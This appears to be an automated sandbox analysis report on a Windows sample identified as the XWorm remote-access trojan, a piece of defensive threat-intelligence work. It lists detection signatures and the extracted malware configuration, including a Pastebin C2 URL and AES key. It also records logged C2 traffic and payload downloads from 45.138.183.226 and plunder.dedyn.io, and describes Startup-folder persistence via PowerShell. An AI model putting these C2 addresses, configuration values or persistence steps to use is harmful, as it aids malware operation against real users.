Windows Analysis Report
KFPYr6f43H.exe

Overview

General Information

Sample name: KFPYr6f43H.exe
renamed because original name is a hash value
Original sample name: 78fc1101948b2fd65e52e09f037bac45.exe
Analysis ID: 1599843
MD5: 78fc1101948b2fd65e52e09f037bac45
SHA1: ba3fc0499ee83a3522c0d50d9faa8edcbd50ad44
SHA256: d3c5ed75f450a48329ca5647cb7d201ba347bd07138ee9b43716df56dd7a1dc2
Tags: exeuser-abuse_ch
Infos:

Detection

XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Copy file to startup via Powershell
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Drops PE files to the startup folder
Joe Sandbox ML detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Suspicious PowerShell Parameter Substring
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection

barindex
Source: http://plunder.dedyn.io/upload/1531 Avira URL Cloud: Label: malware
Source: http://45.138.183.226/upload/1531 Avira URL Cloud: Label: malware
Source: 00000000.00000002.3354430837.00000000031F1000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Xworm {"C2 url": ["https://pastebin.com/raw/7G6zzQwJ"], "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.2"}
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe ReversingLabs: Detection: 42%
Source: KFPYr6f43H.exe Virustotal: Detection: 51% Perma Link
Source: KFPYr6f43H.exe ReversingLabs: Detection: 42%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Joe Sandbox ML: detected
Source: KFPYr6f43H.exe Joe Sandbox ML: detected
Source: 00000000.00000002.3354430837.00000000031F1000.00000004.00000800.00020000.00000000.sdmp String decryptor: https://pastebin.com/raw/7G6zzQwJ
Source: 00000000.00000002.3354430837.00000000031F1000.00000004.00000800.00020000.00000000.sdmp String decryptor: <123456789>
Source: 00000000.00000002.3354430837.00000000031F1000.00000004.00000800.00020000.00000000.sdmp String decryptor: <Xwormmm>
Source: 00000000.00000002.3354430837.00000000031F1000.00000004.00000800.00020000.00000000.sdmp String decryptor: XWorm V5.2
Source: 00000000.00000002.3354430837.00000000031F1000.00000004.00000800.00020000.00000000.sdmp String decryptor: USB.exe
Source: KFPYr6f43H.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: KFPYr6f43H.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: Enalib.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Xml.ni.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: KFPYr6f43H.exe, 00000000.00000002.3371109892.00000000087C3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Accessibility.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.ni.pdbRSDS source: WERFE95.tmp.dmp.13.dr
Source: Binary string: Microsoft.CSharp.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Xml.pdbw source: WERFE95.tmp.dmp.13.dr
Source: Binary string: n0C:\Windows\mscorlib.pdb source: KFPYr6f43H.exe, 00000000.00000002.3378449271.000000000982A000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WERFE95.tmp.dmp.13.dr
Source: Binary string: oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: KFPYr6f43H.exe, 00000000.00000002.3378449271.000000000982A000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdb$ source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Configuration.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: symbols\dll\mscorlib.pdbLb source: KFPYr6f43H.exe, 00000000.00000002.3378449271.000000000982A000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: o.pdb source: KFPYr6f43H.exe, 00000000.00000002.3378449271.000000000982A000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.pdbt^ source: WERFE95.tmp.dmp.13.dr
Source: Binary string: Microsoft.VisualBasic.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Core.ni.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\Document_26390\bin\Debug\Secured\Enalib.pdb source: KFPYr6f43H.exe, KFPYr6f43H.exe.2.dr
Source: Binary string: %%.pdb source: KFPYr6f43H.exe, 00000000.00000002.3378449271.000000000982A000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: mscorlib.pdb source: KFPYr6f43H.exe, 00000000.00000002.3352034906.0000000001662000.00000004.00000020.00020000.00000000.sdmp, WERFE95.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: KFPYr6f43H.exe, 00000000.00000002.3376928032.00000000090D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb[ source: KFPYr6f43H.exe, 00000000.00000002.3378449271.000000000982A000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: KFPYr6f43H.exe, 00000000.00000002.3352034906.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Dynamic.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Management.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Drawing.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: mscorlib.ni.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: Microsoft.CSharp.pdbMicrosoft.VisualBasic.dll@x source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Configuration.pdbD source: WERFE95.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb* source: KFPYr6f43H.exe, 00000000.00000002.3371109892.00000000087C3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: KFPYr6f43H.exe, 00000000.00000002.3352034906.00000000016E5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbl source: KFPYr6f43H.exe, 00000000.00000002.3371109892.00000000087C3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.pdbH source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Management.pdbH source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERFE95.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdbB source: KFPYr6f43H.exe, 00000000.00000002.3352034906.00000000016E5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.ni.pdb source: WERFE95.tmp.dmp.13.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERFE95.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbH source: KFPYr6f43H.exe, 00000000.00000002.3376928032.00000000090D0000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\KFPYr6f43H.exe File opened: C:\Windows\SysWOW64\avicap32.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe File opened: C:\Windows\SysWOW64\MSVFW32.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe File opened: C:\Windows\SysWOW64\en-US\MSVFW32.dll.mui Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\diasymreader.dll Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe File opened: C:\Windows\SysWOW64\en-US\avicap32.dll.mui Jump to behavior
Source: C:\Users\user\Desktop\KFPYr6f43H.exe File opened: C:\Windows\SysWOW64\wbem\en-US\wmiutils.dll.mui Jump to behavior

Networking

barindex
Source: Network traffic Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49744 -> 45.138.183.226:8972
Source: Network traffic Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 45.138.183.226:8972 -> 192.168.2.4:49744
Source: Network traffic Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49744 -> 45.138.183.226:8972
Source: Network traffic Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 45.138.183.226:8972 -> 192.168.2.4:49744
Source: Malware configuration extractor URLs: https://pastebin.com/raw/7G6zzQwJ
Source: unknown DNS query: name: pastebin.com
Source: Yara match File source: 7.2.KFPYr6f43H.exe.2c40674.0.raw.unpack, type: UNPACKEDPE
Source: global traffic TCP traffic: 192.168.2.4:49744 -> 45.138.183.226:8972
Source: global traffic HTTP traffic detected: GET /raw/7G6zzQwJ HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /upload/1531 HTTP/1.1Host: 45.138.183.226Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /upload/1531 HTTP/1.1Host: 45.138.183.226Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox View IP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox View ASN Name: MEER-ASmeerfarbigGmbHCoKGDE MEER-ASmeerfarbigGmbHCoKGDE
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: unknown TCP traffic detected without corresponding DNS query: 45.138.183.226
Source: global traffic HTTP traffic detected: GET /raw/7G6zzQwJ HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /upload/1531 HTTP/1.1Host: 45.138.183.226Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /upload/1531 HTTP/1.1Host: 45.138.183.226Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: pastebin.com
Source: KFPYr6f43H.exe, 00000000.00000002.3354430837.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, KFPYr6f43H.exe, 00000007.00000002.2081035997.00000000029A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://45.138.183.226
Source: KFPYr6f43H.exe, 00000000.00000002.3354430837.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, KFPYr6f43H.exe, 00000007.00000002.2081035997.00000000029A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://45.138.183.226/upload/1531
Source: KFPYr6f43H.exe, KFPYr6f43H.exe.2.dr String found in binary or memory: http://45.138.183.226/upload/1531Ghttp://plunder.dedyn.io/upload/1531
Source: powershell.exe, 00000002.00000002.1834425823.0000000005B1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2053696927.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2047615625.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: KFPYr6f43H.exe, 00000000.00000002.3354430837.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, KFPYr6f43H.exe, 00000007.00000002.2081035997.00000000029A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://plunder.dedyn.io/upload/1531
Source: KFPYr6f43H.exe, 00000000.00000002.3354430837.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1830981348.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp, KFPYr6f43H.exe, 00000007.00000002.2081035997.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2047615625.0000000004C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.13.dr String found in binary or memory: http://upx.sf.net
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000008.00000002.2047615625.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: KFPYr6f43H.exe, 00000000.00000002.3365137373.0000000005C30000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com8W
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: KFPYr6f43H.exe, 00000000.00000002.3365984088.00000000073C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 00000002.00000002.1830981348.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2047615625.0000000004C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBdq
Source: powershell.exe, 00000008.00000002.2053696927.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2053696927.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2053696927.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.2047615625.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1834425823.0000000005B1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2053696927.0000000005CEB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: KFPYr6f43H.exe, 00000007.00000002.2081035997.0000000002C26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pastebin.com/raw/7G6zzQwJ
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

System Summary

barindex
Source: 7.2.KFPYr6f43H.exe.7d20000.3.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 7.2.KFPYr6f43H.exe.7d20000.3.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.KFPYr6f43H.exe.7d20000.3.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 7.2.KFPYr6f43H.exe.7d20000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.KFPYr6f43H.exe.2c40674.0.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 7.2.KFPYr6f43H.exe.2c40674.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 7.2.KFPYr6f43H.exe.2c40674.0.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 7.2.KFPYr6f43H.exe.2c40674.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000002.2101523553.0000000006EF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000007.00000002.2081035997.0000000002A66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000007.00000002.2104534573.0000000007D20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 00000007.00000002.2104534573.0000000007D20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000007.00000002.2081035997.00000000029D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000007.00000002.2081035997.0000000002C26000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFPYr6f43H.exe Jump to dropped file
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_01874740 0_2_01874740
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_0187D7BC 0_2_0187D7BC
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0C4B8 0_2_05D0C4B8
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D05CA0 0_2_05D05CA0
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D02E80 0_2_05D02E80
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D07148 0_2_05D07148
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D09338 0_2_05D09338
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_05D0AA20 0_2_05D0AA20
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_078E3452 0_2_078E3452
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_078EC019 0_2_078EC019
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_078E4BA8 0_2_078E4BA8
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_078E1478 0_2_078E1478
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_0797BE90 0_2_0797BE90
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_089CE190 0_2_089CE190
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_089CD8F8 0_2_089CD8F8
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_089C7A70 0_2_089C7A70
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_089C08E0 0_2_089C08E0
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_089CD470 0_2_089CD470
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_089CD460 0_2_089CD460
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_09975930 0_2_09975930
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_09976830 0_2_09976830
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_0997EAF0 0_2_0997EAF0
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_0997DA91 0_2_0997DA91
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_0997DAA0 0_2_0997DAA0
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_0997B7B4 0_2_0997B7B4
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_09D9A948 0_2_09D9A948
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_09D900F9 0_2_09D900F9
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_09D9F000 0_2_09D9F000
Source: C:\Users\user\Desktop\KFPYr6f43H.exe Code function: 0_2_09D9B218 0_2_09D9B218
